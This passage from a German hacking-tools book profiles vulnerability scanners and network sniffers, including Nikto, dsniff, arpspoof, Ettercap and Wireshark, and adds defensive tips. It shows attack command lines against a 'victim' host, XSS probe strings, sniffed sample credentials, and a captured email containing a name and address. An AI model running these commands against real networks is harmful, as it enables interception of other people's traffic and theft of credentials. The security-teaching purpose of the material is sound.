per SSH oder SMB auf das Zielsystem zu und prüft Anwendungszustände, die von außen nicht erkennbar sind, wie etwa den Patchlevel von Anwendungen oder die Komplexität der lokalen Kennwörter. Das Herzstück des »Open Vulnerability Assessment System« bildet eine Serverkomponente, die eine Sammlung von Network Vulnerability Tests (NVT) nutzt, um Sicherheitsprobleme in Netzwerksystemen und -anwendungen aufzuspüren. Nach Beginn der Verwundbarkeitsanalyse besteht die Möglichkeit, eine Vielzahl von Parametern zu definieren, etwa Ziele, Abhängigkeiten, Scanner und Plugins. Die Plugins, die regelmäßig erweitert und sowohl von der Community als auch von kommerziellen Anbietern heruntergeladen werden können, ermöglichen die Aufdeckung diverser Sicherheitslücken der zu scannenden Hosts. OpenVAS speichert die Ergebnisse in einer Datenbank, ein Export in PDF, HTML, XML, NBE ist möglich.

Bild 7.5: Der OpenVAS-Client nebst Scanreports

7.5 Nikto2

75

Bild 7.6: Verlauf der Verwundbarkeitsanalyse durch OpenVAS

7.5

Nikto2

Anbieter

http://www.cirt.net/nikto2

Preis

-

Betriebssystem(e)

Perl-Script: Linux/UNIX, Windows, BSD, Mac OS X

Sprachen

Englisch

Kategorie(n)

Webserver / CGI-Scanner

Oberfläche

GUI

Größe

< 2 MB Installation / Kompilation

Nein

Usability



Know-how

Schnittstellen

CMD x Benötigt Perl und LibWhisker, SSL zum Scannen von HTTPS 

Nikto ist ein auf der Programmiersprache Perl basierender Scanner für das Aufdecken von Schwachstellen auf Webservern und CGI-Scripten. Hierbei entdeckt Nikto auf der Suche nach Risiken u. a. Fehlkonfigurationen, unsichere Dateien, Scripts und überalterte Software. Ein Start von Nikto2 mit den Parametern •

-host (target host)

bringt folgendes Ergebnis (aus Gründen der Übersicht gekürzt):

discordia:~# ./nikto.pl -host www.victim.org - Nikto v2.1.0 --------------------------------------------------------------------------+ Target IP: 213.180.34.253 + Target Hostname: www.victim.org

76

Kapitel 7 – Security-/Vulnerability-Scanner

+ Target Port: 80 + Start Time: 2010-03-19 06:53:12 --------------------------------------------------------------------------+ Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e PHP/4.3.10-16 - Root page / redirects to: org-new/warez.php + OSVDB-0: robots.txt contains 12 entries which should be manually viewed. + OSVDB-27487: Apache is vulnerable to XSS via the Expect header + OSVDB-0: Apache/1.3.33 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current. + OSVDB-0: mod_ssl/2.8.22 appears to be outdated (current is at least 2.8.31) (may depend on server version) + OSVDB-0: OpenSSL/0.9.7e appears to be outdated (current is at least 0.9.8i) (may depend on server version) + OSVDB-0: Number of sections in the version string differ from those in the database, the server reports: 4.3.10.45.16 while the database has: 5.2.8. This may cause false positives. + OSVDB-0: PHP/4.3.10-16 appears to be outdated (current is at least 5.2.8) + OSVDB-0: Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-32774: /phpinfo.php?VARIABLE=alert('Vulnerable'): Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS). + OSVDB-3233: /phpinfo.php: Contains PHP configuration information + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. + OSVDB-3092: /shop/: This might be interesting... + OSVDB-3092: /stats/: This might be interesting... + OSVDB-20406: /phpinfo.php?GLOBALS[test]=alert(document.cookie);: PHP contains a flaw that allows a remote cross site scripting attack. + OSVDB-24484: /phpinfo.php?cx[]=V8JEpXtJUv8zuJ2qxhcF2bOGYbYOd343PBnhCOXJ8MQfc1hfs4mDZHgAk kE3cgQFSJBu1FNwSZnGEF2MlWbS6NEkPyejjmm0fRGK1s1CiP7MB1eWa8GtkgeEESrEoYlM9Ygt VwTW9i87VAiOoRPtTvVL1fR42W9uMTfOz83j5UQ6KxMItX00mC7JFkaKXRh6hRUwZ0cC8ZPSWSP luQEr20oFuGDaHALaoN (...) KWYjIFKOqRunREl7wZRPahfx1HsGcilmOsE6L5tPaU6zJoWH1crG8mqu18T5DranFpXcsC8mHPP rFa90ARjRecz6PLGzh1YLnoB38F6AIFqRZWlivaWmfrMe3Blcar1HriPcc2H4ks7YjMQDwGRSLo foXaOC3TUmq8cTpB6n29mWMe8rAgkCjK2Um7uguFfgMw4M6IbtMztbaf5wRBalert(f oo): PHP 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS + 3588 items checked: 16 item(s) reported on remote host + End Time: 2010-03-19 06:01:44 (512 seconds) --------------------------------------------------------------------------+ 1 host(s) tested discordia:~#

Bild 7.7: Nikto beim Aufzeigen von Schwachstellen eines Webservers

7.6 w3bfukk0r

7.6

77

w3bfukk0r

Anbieter / Entwickler

http://ngolde.de/w3bfukk0r.html

Preis

-

Betriebssystem(e) Linux/UNIX, Mac OS X

Sprachen

Englisch

Kategorie(n)

Forced Browsing Tool

Oberfläche

Größe

< 2 MB

Nein / Ja

Usability



Installation / Kompilation

Know-how

GUI

CMD x

Schnittstellen 

w3bfukk0r ist ein Forced Browsing Tool und entdeckt durch einen Wörterbuchangriff getarnte Ressourcen auf Webservern, die eigentlich nicht referenziert werden. w3bfukk0r unterstützt HTTP/HTTPS, Banner-Grabbing und die Tarnung des UserAgents. Eine Abfrage, angesetzt auf www.victim.org mit dem beiliegenden (und natürlich erweiterbaren) Wörterbuch: •

-f (specify wordlist file)

bringt folgendes Ergebnis:

discordia:~# ./w3bfukk0r -f words.txt http://www.victim.org Starting w3bfukk0r 0.2 Scanning http://www.victim.org/ with 101 words from words.txt Found http://www.victim.org/music/ (HTTP 200) Found http://www.victim.org/cgi-bin/ (not public; HTTP 403) Found 2 directories. Server runs: Apache/2.2.15 (Unix) Scan finished (2 seconds). discordia:~#

Bild 7.8: w3bfukk0r beim Enttarnen unreferenzierter Verzeichnisse eines Webservers

7.7

Abwehr – generelle Tipps

Die beste Abwehr gegen Schwachstellenscanner ist der Einsatz derselben. In diesem Fall ist das Gift selbst das Antidot, d. h., um die Angriffspunkte von Hosts zu reduzieren, müssen sie zuallererst detektiert werden, z. B. durch die oben genannten Tools. Hier bietet es sich insbesondere in Unternehmensnetzwerken an, auf regelmäßiger Basis – z. B. wöchentlich – alle schutzbedürftigen Server nach Schwachstellen abzuklopfen, um so einem potenziellen Angreifer zuvorzukommen. Zudem lässt sich über dieses Vorge-

78

Kapitel 7 – Security-/Vulnerability-Scanner

hen wirkungsvoll überprüfen, ob Security Policies, z. B. aus dem Umfeld des PatchManagement oder Vorgaben zur Deaktivierung nicht benötigter Dienste, unternehmensweit eingehalten werden. Einen Einstieg in das Thema liefert die Maßnahme »5.150 Durchführung von Penetrationstests«14 aus den IT-Grundschutz-Katalogen und auch die Studie Durchführungskonzept für Penetrationstests15 vom BSI16.

14

https://www.bsi.bund.de/cln_134/ContentBSI/grundschutz/kataloge/m/m05/m05150.html

15

https://www.bsi.bund.de/cae/servlet/contentblob/487300/publicationFile/30674/penetrationstest_pdf.pdf

16

http://www.bsi.de

79

8

Sniffer: Die Schnüffler im Netzwerk

Das Wort »Sniffer« gilt heute zwar als Gattungsbegriff für alle Tools, die Datenpakete innerhalb des Netzwerkverkehrs abgreifen und analysieren können, tatsächlich ist der Begriff ein gesetzlich geschütztes Warenzeichen der Firma Network General. Auch für diese Werkzeuge gilt, dass es keine scharf umrissene Trennungslinie zwischen Netzwerkanalyse und Netzwerkspionage gibt. Für Administratoren sind sie unverzichtbare Analysewerkzeuge, um Netzwerkstörungen und -problemen, aber auch Einbruchsversuchen auf die Spur zu kommen. Auf der anderen Seite sind Sniffer hocheffiziente, im Einsatz kaum zu entdeckende Spionagetools. Grundsätzlich kann jeder Rechner mit eingebauter Netzwerkkarte seine ein- und ausgehenden Daten analysieren. Um die Datenpakete anderer Netzrechner analysieren zu können, bedarf es eines technischen Tricks: Man muss die Karte in den Promiscuous Mode schalten. Wie der Name schon sagt, ist der Rechner jetzt in der Lage, alle Datenpakete (Frames), nicht nur die an ihn direkt adressierten, zu empfangen und auszuwerten. Begrenzt wird diese Fähigkeit durch die Netzwerkstruktur. Sofern die Rechner über Hubs miteinander verbunden sind, kann der gesamte Datenverkehr dieser Rechner mitgeschnitten werden. Sind die Rechner über Switches vernetzt, die Datenpakete gezielt versenden, funktioniert dieser Trick nicht mehr. Um in geswitchten Netzwerken sniffen zu können, müssen zusätzliche Angriffstechniken eingesetzt werden, z. B. ARP-Spoofing (ARP Request Poisoning) oder MAC-Flooding. Das grundsätzliche Problem beim Sniffen ist nicht die Technik, sondern das Datenaufkommen. Was an der Netzwerkkarte abgegriffen werden kann, sind Frames, d. h. Datenpakete, die für die Übertragung auf Layer 2 des OSI-Schichtenmodells kodiert sind und jede Menge Steuercodes, Headerinformationen usw. enthalten. Die Kunst des Sniffens hängt also entscheidend davon ab, wie gut sich aus diesen Datenpaketen die Nutzdaten (Logins, Passwörter, Texte von E-Mail etc.) herausfiltern lassen. Gegen Sniffer ist kein wirkungsvolles Kraut gewachsen, außer man setzt auf eine konsequente Verschlüsselung des gesamten Datenverkehrs. Mit anderen Worten: Das Herausfischen von interessanten Daten aus dem Netzwerkverkehr ist zwar aufwendig, aber für den Angreifer lohnend bei minimalem Risiko. Einziger Anhaltspunkt für den Verteidiger ist die Suche nach Netzwerkkarten, die sich im Promiscuous Mode befinden, oder der Einsatz von Anti-Spoofing-Technologien.

80

Kapitel 8 – Sniffer: Die Schnüffler im Netzwerk

8.1

dsniff (dsniff-Suite)

Anbieter

www.monkey.org/~dugsong/dsniff

Betriebssystem(e) Linux/UNIX Kategorie(n) Größe

Usability

Sniffer (Passwörter)

< 2 MB Installation / Ja Kompilation 

Preis

-

Sprachen

Englisch

Oberfläche

GUI

CMD x

Schnittstellen Benötigt BerkeleyDB, OpenSSL, libpcap, libnet und libnids Know-how



Das dsniff-Paket beinhaltet eine Sammlung machtvoller Tools zur Netzwerkanalyse. Die passiven Programme dsniff, mailsnarf, msgsnarf, urlsnarf und webspy belauschen Netzwerkverkehr nach interessanten Daten (Passwörtern, E-Mails, Dateien, etc.). Mit den Programmen arpspoof, dnsspoof und macof kann Netzwerkverkehr gefälscht und kanalisiert werden. Die Programme sshmitm und webmitm ermöglichen Man-in-the-middleAttacken umgeleiteter SSH- und HTTPS-Verbindungen, tcpkill und tcpnice ermöglichen den Abbruch bzw. die Verlangsamung von Netzwerkverbindungen. Bei dsniff handelt es sich um einen Sniffer der dsniff-Suite, der die Kennwörter folgender unverschlüsselter Protokolle automatisch aus dem Datenstrom abfängt: FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase und Microsoft SQL-Protokoll. Der Einsatz von dsniff, gefunden an dem Netzwerkinterface eth0: •

-i interface (Specify the interface to listen on)

bringt folgendes Ergebnis: discordia:~# dsniff -i eth0 dsniff: listening on eth0 ----------------09/27/09 16:05:26 tcp 192.168.1.200.32779 -> 192.168.1.50.23 (telnet) shellmaster paSSww00RD!shell ----------------09/27/09 17:25:54 tcp 192.168.1.190.3023 -> pop.kundenserver.de.110 (pop) USER 564565675 PASS 125125 ----------------09/27/09 18:05:23 tcp 192.168.1.190.4151 -> 192.168.1.100.5631 (pcanywhere) ll 1231234

8.2 mailsnarf (dsniff-Suite)

81

----------------09/27/09 18:12:16 tcp 192.168.1.190.3013 -> ftpav.ca.com.21 (ftp) USER administrator PASS secretpass ----------------09/27/09 20:34:23 tcp 192.168.1.190.233 -> 192.168.1.1.80 (http) GET / HTTP/1.1 Host: 192.168.1.1 Authorization: Basic YWRtaW46YWRtaW4= [admin:admin] -----------------

09/27/09 18:05:23 192.168.1.200:5900 -> 192.168.1.220:4087

VNC

USER: On display :0 PASS: Server Challenge: 803ddab86c1d8fd69e1d094113ddb1cf Client 3DES: 6219eca12720ee27c7c3397de9f0222e ----------------09/27/09 18:05:23 192.168.1.200:4653 -> 192.168.1.10:139

netbios-ssn

USER: Administrator PASS: LC 2.5 FORMAT: "USER":3:3E8DB789C2AE3248:B93390C49E0BC96F00000000000000000000000000000000:7 7E6B8E556D85567167AFEA3A726D359664A441098CBBDE2

Bild 8.1: dsniff beim Mitschneiden diverser Verbindungen

8.2

mailsnarf (dsniff-Suite)

Anbieter

www.monkey.org/~dugsong/dsniff

Betriebssystem(e) Linux/UNIX Kategorie(n)

Sniffer (E-Mail)

Größe

< 2 MB

Usability



Installation / Kompilation

Preis

-

Sprachen

Englisch

Oberfläche GUI Ja

Schnittstellen

Know-how

CMD x

Benötigt BerkeleyDB, OpenSSL, libpcap, libnet und libnids 

82

Kapitel 8 – Sniffer: Die Schnüffler im Netzwerk

Das Tool mailsnarf aus der dsniff-Suite speichert E-Mails, die aus POP- und SMTPTraffic herausgefiltert wurden, in ein klassisches Berkeley-mbox-Format. Die mboxDatei kann anschließend mit einem E-Mail-Programm (z. B. Mozilla Thunderbird oder Mutt) geladen und betrachtet werden. Der Einsatz von mailsnarf, gefunden an dem Netzwerkinterface eth0: •

-i interface (Specify the interface to listen on)

bringt folgendes Ergebnis:

[email protected]:~# mailsnarf -i eth0 mailsnarf: listening on eth0 From [email protected] Thu Feb 4 22:16:28 2010 Received: from 127.0.0.1 (AVG SMTP 9.0.733 [271.1.1/2667]); Thu, 04 Feb 2010 21:15:36 +0100 Message-ID: [email protected] Date: Thu, 04 Feb 2010 21:15:36 +0100 From: [email protected][email protected] User-Agent: Thunderbird 2.0.0.23 (Windows/20090812) MIME-Version: 1.0 To: [email protected] Subject: eBay-Rechnung vom Sonntag, 31. Januar 2010 Content-Type: text/plain; charset=windows-1252; format=flowed Content-Transfer-Encoding: 8bit

-------------------------------------------------------------------------------------------------------------------eBay hat diese Mitteilung an Heiko Langer (etcpasswd) gesendet. Ihr Vor- und Nachname in dieser Mitteilung sind ein Hinweis darauf, dass die Nachricht tatsächlich von eBay stammt. Mehr zum Thema: http://pages.ebay.de/help/confidence/name-useridemails.html --------------------------------------------------------------------------------------------------------------------

8.3 urlsnarf (dsniff-Suite)

83

***Dies ist eine automatisch generierte E-Mail. Bitte antworten Sie nicht darauf.*** Rechnungsnummer:

013499-172583110033

Heiko Langer Roonstraße 10 49078 Osnabrueck Deutschland

Hallo Langer Heiko (etcpasswd), Ihre monatliche Rechnung von eBay für den Zeitraum von 01. Januar 2010 bis 31. Januar 2010 steht jetzt zur Ansicht online bereit.

Fälliger Betrag:

31,18

Sie haben als automatische Zahlungsmethode das Lastschriftverfahren gewählt. Der Rechnungsbetrag wird innerhalb der nächsten 5 bis 7 Tage (...)

Bild 8.2: Das Programm mailsnarf beim Mitschneiden transferierter E-Mails

8.3

urlsnarf (dsniff-Suite)

Anbieter

www.monkey.org/~dugsong Preis /dsniff

-

Betriebssystem(e)

Linux/UNIX

Sprachen

Englisch

Kategorie(n)

Sniffer (URLs)

Oberfläche

GUI

Größe

< 2 MB

Ja Schnittstellen Benötigt BerkeleyDB, OpenSSL, libpcap, libnet und libnids

Usability



Installation / Kompilation

Know-how

CMD

x



Das Tool urlsnarf aus der dsniff-Suite erzeugt eine CLF-Datei (Common Log Format) des mitgeschnittenen HTTP-Traffics eines Netzwerks. Die CLF-Datei kann im Anschluss mit einem dazu geeigneten Programm zur Analyse von Web-Logfiles untersucht werden. Der Einsatz von urlsnarf, gefunden an dem Netzwerkinterface eth0: •

-i interface (Specify the interface to listen on)

bringt folgendes Ergebnis:

84

Kapitel 8 – Sniffer: Die Schnüffler im Netzwerk

[email protected]:~# urlsnarf -i eth0 192.168.1.217 – - [04/Feb/2010:11:50:03 +0100] "GET http://avgtechnologies.112.2o7.net/b/ss/avgcorporatepublicww/1/H.17/s896381 35944740?AQB=1&ndh=1&t=4/1/2010%2020%3A49%3A39%204%20-60&ce=UTF8&ns=avgtechnologies&pageName=http%3A//static.avg.com/programupdate/de.perform-program-update.html&g=http%3A//static.avg.com/programupdate/de.perform-programupdate.html&server=static.avg.com&events=event23&c6=DE&v6=DE&c8=DEDE&c14=DE&c15=DE-DE&v22=http%3A//static.avg.com/program-update/de.performprogram-update.html&v23=DE&c24=Direct%20Load&v24=DE-DE&v30=popupcampaign_perform-programupdate_de&s=1024x768&c=32&j=1.5&v=Y&k=Y&bw=604&bh=347&ct=lan&hp=N&AQE=1 HTTP/1.1" – - "http://static.avg.com/program-update/de.perform-programupdate.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 192.168.1.229 – - [04/Feb/2010:11:50:08 +0100] "GET http://intranet.discordiawerke.de/ HTTP/1.1" – - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" 192.168.1.10 – - [04/Feb/2010:11:50:13 +0100] "GET http://www.heise.de/ HTTP/1.1" – - "-" " Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 192.168.1.10 – - [04/Feb/2010:11:50:13 +0100] "GET http://www.heise.de/newsticker/foren/S-Regiert-sein-das-heisst/forum141674/msg-15333344/read/ HTTP/1.1" – - "-" " Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" ^C [email protected]:~#

Bild 8.3: Das Tool urlsnarf beim Mitschneiden von Webverbindungen

8.4

arpspoof (dsniff-Suite)

Anbieter

www.monkey.org/~dugsong/ dsniff

Betriebssystem(e) Linux/UNIX Kategorie(n)

Netzwerktool (Arpspoofing)

Größe

< 2 MB

Usability



Installation / Kompilation

Ja

Preis

-

Sprachen

Englisch

Oberfläche

GUI

Schnittstellen

Know-how

CMD x

Benötigt BerkeleyDB, OpenSSL, libpcap, libnet und libnids 

Das Tool arpspoof aus der dsniff-Suite ermöglicht durch die Technik des »Arpspoofings« die gezielte Umleitung des Netzwerkverkehrs. Üblicherweise wird hierzu der Netzwerkverkehr zum lokalen Gateway über den Rechner des Angreifers geleitet, der daraufhin

8.5 PHoss

85

sämtliche Netzwerkpakete z. B. mit einem separat zu startenden Sniffer wie dsniff oder Ettercap NG durchleuchten kann. Der Einsatz von arpspoof, gefunden an dem Netzwerkinterface eth0: •

-i interface (Specify the interface to listen on)



-t target

bringt folgendes Ergebnis: [email protected]:~# arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 0:21:86:58:f0:ce 0:21:86:58:f0:ce 0:21:86:58:f0:ce 0:21:86:58:f0:ce 0:21:86:58:f0:ce 0:21:86:58:f0:ce 0:21:86:58:f0:ce 0:21:86:58:f0:ce 0:21:86:58:f0:ce 0:21:86:58:f0:ce (...)

0:17:31:78:81:c7 0806 42: arp reply 192.168.1.1 is-at 0:17:31:78:81:c7 0806 42: arp reply 192.168.1.1 is-at 0:17:31:78:81:c7 0806 42: arp reply 192.168.1.1 is-at 0:17:31:78:81:c7 0806 42: arp reply 192.168.1.1 is-at 0:17:31:78:81:c7 0806 42: arp reply 192.168.1.1 is-at

Bild 8.4: arpspoof beim Spoofing eines Netzwerks

8.5

PHoss

Anbieter

www.phenoelitus.org/fr/tools.html

Preis

-

Betriebssystem(e)

Linux/UNIX

Sprachen

Englisch

Kategorie(n)

Sniffer (Passwörter)

Oberfläche

GUI

Größe

< 2 MB

Nein / Schnittstellen Ja

Usability



Installation / Kompilation

Know-how

CMD x



PHoss ist ein Sniffer von Phenoelit, der die Kennwörter zu den Login-Sessions von HTTP, FTP, LDAP, Telnet, IMAP4, POP3 und VNC-Password-Challenges aufgreift. Der Einsatz von PHoss, gefunden an dem Netzwerkinterface eth0: •

-i (use this interface)

bringt folgendes Ergebnis:

86

Kapitel 8 – Sniffer: Die Schnüffler im Netzwerk

discordia:~# Phoss -i eth0 PHoss (Phenoelit's own security sniffer) (c) 1999 by Phenoelit (http://www.phenoelit.de) $Revision: 1.13 $ >>>>>>>>>>>>>>>>>>>>>>>>>>>>> Source: 192.168.1.101:2705 Destination: 194.25.134.93:110 Protocol: POP3 Data: 054174835:999888 >>>>>>>>>>>>>>>>>>>>>>>>>>>>> Source: 192.168.1.101:2774 Destination: 212.227.15.183:110 Protocol: POP3 Data: m8465732-5:9675843 >>>>>>>>>>>>>>>>>>>>>>>>>>>>> Source: 192.168.1.101:2705 Destination: 194.25.134.93:110 Protocol: POP3 Data: 054174835:999888 >>>>>>>>>>>>>>>>>>>>>>>>>>>>> Source: 192.168.1.101:2774 Destination: 212.227.15.183:110 Protocol: POP3 Data: m8465732-5:9675843 Goodbye

Bild 8.5: PHoss beim Mitschneiden von POP3-Verbindungen

8.6

Driftnet

Anbieter

http://www.exparrot.com/~chris/driftnet

Betriebssystem(e) Linux/UNIX

Preis Sprachen

Kategorie(n)

Sniffer (JPEG/GIF-Grafiken) Oberfläche

Größe

< 2 MB

Usability



Installation / Kompilation

Englisch GUI

Nein / Schnittstellen Ja Know-how

CMD

x



Driftnet erfasst JPEG- und GIF-Grafiken aus dem Netzwerktraffic und stellt diese in einem X-Window dar. Die Grafiken, die in wie in einer Slideshow abgespielt werden, lassen sich zudem auf der Festplatte abspeichern. Der Einsatz von driftnet mag ein Ergebnis liefern wie folgt: [email protected]:~# driftnet

8.7 Ettercap / Ettercap NG

87

Bild 8.6: Driftnet bei einer Slideshow der besonderen Art

8.7

Ettercap / Ettercap NG

Anbieter

http://ettercap.sourceforge.net

Preis

-

Betriebssystem(e) Linux/UNIX, FreeBSD, OpenBSD, NetBSD, Mac OS X, Windows, Solaris

Sprachen

Englisch

Kategorie(n)

Sniffer (z. B. Passwörter)

Oberfläche

Größe

< 10 MB

Nein / Ja

Usability



Installation / Kompilation

Know-how

GUI

x

CMD x

Schnittstellen Benötigt zlib, libpcap, libnet und libpthread. Vielfältige Plugins 

Ettercap ist ein mächtiger Sniffer, z. B. für Man-in-the-middle-Attacken in einem LAN. Ettercap kann Echtzeitverbindungen (Live-Connections) inklusive Login-Daten mitschneiden, relevante Inhalte filtern und verfügt über erweiterbare Plugins und vieles mehr. Ettercap unterstützt die aktive und passive Analyse vieler Protokolle und versteht sich in vielfältiger Weise auf die Netzwerk- und Hostanalyse. Zu dem kommandozeilenbasierten Tool gibt es ein GUI auf NCurses-Basis und ein grafisches GTK-GUI. Der Aufruf von Ettercap für das Ncurses-Interface und •

-C, --curses (use curses GUI)

bringt u. a. folgendes Ergebnis: discordia:~# ettercap –C

88

Kapitel 8 – Sniffer: Die Schnüffler im Netzwerk

Bild 8.7: Ettercap mit NCurses-GUI

8.8

tcpdump

Anbieter

www.tcpdump.org

Preis

-

Betriebssystem(e)

Linux/UNIX, Windows (WinDump)

Sprachen

Englisch

Kategorie(n)

Netzwerkverkehr-Analyseprogramm

Oberfläche

GUI

Größe

< 2 MB

Nein/ Schnittstellen Ja

Usability



Installation / Kompilation

Know-how

CMD x WinDump benötigt die WinPcap-Library



Tcpdump liest Daten in Form von Paketen, die über das Netzwerk gesendet werden, und dient als leistungsfähige Sniffing-Software zur Auswertung von Netzwerkverkehr. Tcpdump ermöglicht die Überwachung der Kommunikation zwischen verschiedenen Teilnehmern eines Netzwerks. Der Einsatz von tcpdump, gefunden an dem Netzwerkinterface eth0: •

-i interface

bringt folgendes Ergebnis (aus Übersichtszwecken leicht gekürzt):

8.9 Wireshark

89

discordia:~# tcpdump –i eth0 20:57:56.797548 172.16.3.24 > igrp-routers.mcast.net: ip-proto-88 40 [tos 0xc0] 20:57:56.798277 0:50:4:a4:84:b > Broadcast sap e0 ui/C >>> Unknown IPX Data: (67 bytes) [000] FF FF 00 50 00 14 00 00 00 00 FF FF FF FF FF FF ...P.... ........ [010] 04 55 00 00 00 00 00 50 04 A4 84 0B 04 55 00 01 .U.....P .....U.. [020] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ [030] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 ........ ........ [040] 53 41 50 SAP len=67 20:57:56.799413 0:d0:b7:a:a0:11 > Broadcast sap e0 ui/C >>> Unknown IPX Data: (67 bytes) [000] FF [010] 04 [020] 00 [030] 00 [040] 53 len=67 (...)

FF 55 00 00 56

00 04 00 00 31

50 95 00 00

00 41 00 00

14 A0 00 00

00 00 00 00

00 D0 00 00

00 B7 00 00

20:57:57.314992 0:30:5:38:d2:fd > >>> Unknown IPX Data: (79 bytes) [000] FF FF 00 60 00 04 04 95 41 [010] 04 52 04 95 41 A0 00 30 05 [020] 06 40 4F 53 50 43 31 32 36 [030] 00 00 00 00 00 00 00 00 00

00 0A 00 00

FF A0 00 00

FF 11 00 00

FF 04 00 00

FF 55 00 00

FF 00 00 00

FF 01 00 01

...P.... .U..A... ........ ........ SV1

........ .....U.. ........ ........

...'.... .R..A..0 [email protected] ........

A....... [email protected] 61...... ........

Broadcast sap e0 ui/C A0 38 31 00

FF D2 00 00

FF FD 00 00

FF 40 00 00

FF 08 00 00

FF 00 00 00

FF 02 00 00

Bild 8.8: Tcpdump beim Mitlesen von Datenverkehr

8.9

Wireshark

Anbieter

www.wireshark.org

Preis

-

Betriebssystem(e)

Windows, Linux, UNIX und andere

Sprachen

Englisch

Kategorie(n)

Sniffer / Network Protocol Analyzer

Oberfläche

Größe

< 15 MB

Schnittstellen Ja, Portable verfügbar

Usability



Installation

Know-how

GUI

x

CMD

Benötigt für Windows: WinPcap; AirPcap, CACE Pilot (optional)



90

Kapitel 8 – Sniffer: Die Schnüffler im Netzwerk

Wireshark (der Nachfolger von Ethereal) ist ein Packet-Sniffer, der Netzwerkprotokolle – vorzugsweise TCP/IP – analysiert und die mitgehörten Datenpakete bzw. Frames zwecks Auswertung in diversen Ausgabeformaten zur Verfügung stellt. Über unterschiedliche Filtertechniken können die ziemlich umfangreichen Rohdaten entsprechend reduziert werden. Der Bildschirm ist dreiteilig: Im ersten Fenster sieht man die Paketliste mit Absender und Empfänger, im mittleren die Paketdetails mit Layerinformationen, MAC-Adressen etc. und im dritten die hexadezimale Paketanzeige. Ein Paketsniffer ist nicht per se ein Angriffswerkzeug, sondern dient vorzugsweise der detaillierten Fehlersuche in Netzwerken, z. B. nach Performanceverlusten im Netz, sucht nach doppelten Hostnamen oder doppelten MAC-Adressen. Für Netzwerkangreifer ist das Tool sehr interessant, da viele Daten weiterhin unverschlüsselt übertragen werden, unter anderem auch Login-Daten, Passwörter, Inhalte von E-Mails etc. In geswitchten Netzen, in denen die Rechner nicht über Hubs verbunden sind, ist die Reichweite von Paketsniffern aus technischen Gründen limitiert, da hier auf dem System des Angreifers nur die Datenpakete ankommen, die für alle User oder ihn speziell gedacht sind. Hier empfiehlt sich der zusätzliche Einsatz von SwitchSniffer. Die Abwehrmöglichkeiten gegen Paketsniffer sind begrenzt. Wenn der Angriff gut gemacht ist, bleibt er in der Regel unentdeckt.

Bild 8.9: Gesniffte Datenströme in Wireshark

8.10

Abwehr – generelle Tipps

Gegen Netzwerksniffer ist kein Kraut gewachsen. Ihr Einsatz, der auf das Abfangen von Benutzerkennungen, Passwörtern und weiteren vertraulichen Inhalten gerichtet ist, bleibt meist unbemerkt. Auf der anderen Seite sind Sniffer durchaus kein Werkzeug für

8.10 Abwehr – generelle Tipps

91

Skript-Kiddies, da doch etliches Netzwerk-Know-how inkl. Verständnis von Protokollen, Filtertechniken etc. erforderlich ist. Missbrauch kann man lediglich durch die Verwendung starker Kryptografie und einer sicheren Netzwerktopologie eindämmen. Hat man einen Rechner im Verdacht, einen Sniffer zu beheimaten, kann man testen, inwieweit dort der Promiscuous-Mode eingebunden ist, der das Netzwerk-Interface in den entsprechenden »Sniffer Mode« schaltet.

93

9

Sonstige Hackertools

Hier stellen wir Ihnen weitere »schmutzige Hackertricks« vor, damit Sie eine ungefähre Ahnung gewinnen, mit welchen Angriffsarten und -methoden Sie sonst noch rechnen müssen. Beim Ausprobieren ist größte Vorsicht angeraten, da die Gefahr besteht, dass Sie Ihr System nachhaltig beschädigen. Wenn Ihnen ein selbst generierter Wurm in die freie Wildbahn entweichen sollte, haben Sie noch größere Probleme am Hals, denn damit können Sie sehr viele Internet-User schädigen und müssen sich gegebenenfalls auch strafrechtlich zur Verantwortung ziehen lassen. Trotz allem scheint es uns aber wichtig, Ihnen eine funktionstüchtige Kette aufzuzeigen, wie andere es schaffen, Ihr System zu infiltrieren und bestehende Schutzmechanismen auszuhebeln.

9.1

Metasploit Framework (MSF)

Anbieter

http://www.metasploit.com/ framework

Preis

-

Betriebssystem(e) Linux/UNIX, Mac OS X, Windows Sprachen

Englisch

Kategorie(n)

Exploit/Payload-Suite

Oberfläche

GUI

Größe

< 50 MB

Nein / Ja

Usability



Installation / Kompilation

x

CMD

x

Schnittstellen Perl

Know-how



Das Metasploit Framework ist eine mächtige, mittlerweile auf der Programmiersprache Ruby basierende Entwicklungs- und Testumgebung für diverse Exploits, Payloads, Opcodes und Shellcodes. Metasploit Framework stellt drei Oberflächen bereit und kann im interaktiven ConsoleMode (msfconsole), als zu automatisierender Console-Mode (msfcli) oder als Webinterface (msfweb) gestartet werden (msfweb wird ab Version 3.3 jedoch offiziell nicht weiter unterstützt). Das Framework kann durch externe Add-ons in verschiedenen Sprachen erweitert werden.

94

Kapitel 9 – Sonstige Hackertools

Der Start des interaktiven Console-Mode mit msfconsole bringt folgendes Ergebnis:

